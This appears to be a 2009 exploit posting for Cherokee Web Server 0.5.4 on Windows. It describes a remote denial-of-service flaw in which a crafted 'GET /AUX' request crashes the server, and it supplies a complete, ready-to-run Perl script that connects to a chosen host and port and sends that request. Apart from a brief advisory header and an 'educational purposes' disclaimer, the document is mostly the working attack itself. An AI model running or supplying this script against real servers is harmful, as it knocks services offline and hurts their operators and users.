cherokee054-dos.txt
Posted on 26 October 2009
########################################################################################### # # Name : Cherokee Web Server 0.5.4 Denial Of Service # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: 25/10/09 # Tested on Windows ! ########################################################################################### Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page : http://www.cherokee-project.com/download/windows/ [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes ! [*] Exploitation : #!/usr/bin/perl # Cherokee Web Server 0.5.4 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [25/10/09] $host = $ARGV[0]; $PORT = $ARGV[1]; $packet = "AUX"; $stuff = "GET /".$packet." HTTP/1.1 " . "User-Agent:Bitch/1.0 (Windows NT 5.1; U; en) " . "Host:127.0.0.1 ". "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 ". "Accept-Language: en-US,en;q=0.9 ". "Accept-Charset: iso-8859-1,*,utf-8 ". "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 "; use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+ "; print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] + "; print "+ Author [Usman Saeed] + "; print "+ Company [Xc0re Security Research Group] + "; print "+ DATE: [25/10/09] + "; print "+ Usage :perl sploit.pl webserversip wbsvrport + "; print "+ Disclaimer: [This code is for Educational Purposes , + "; print "+ I would Not be responsible for any misuse of this code]+ "; print "+========================================================+ "; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+ "; print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] + "; print "+ Author [Usman Saeed] + "; print "+ Company [Xc0re Security Research Group] + "; print "+ DATE: [25/10/09] + "; print "+ Usage :perl sploit.pl webserversip wbsvrport + "; print "+ Disclaimer: [This code is for Educational Purposes , + "; print "+ I would Not be responsible for any misuse of this code]+ "; print "+========================================================+ "; print " "; print "[*] Initializing "; sleep(2); print "[*] Sendin DOS Packet "; send ($sock , $stuff , 0); print "[*] Crashed :) "; $res = recv($sock,$response,1024,0); print $response; exit;
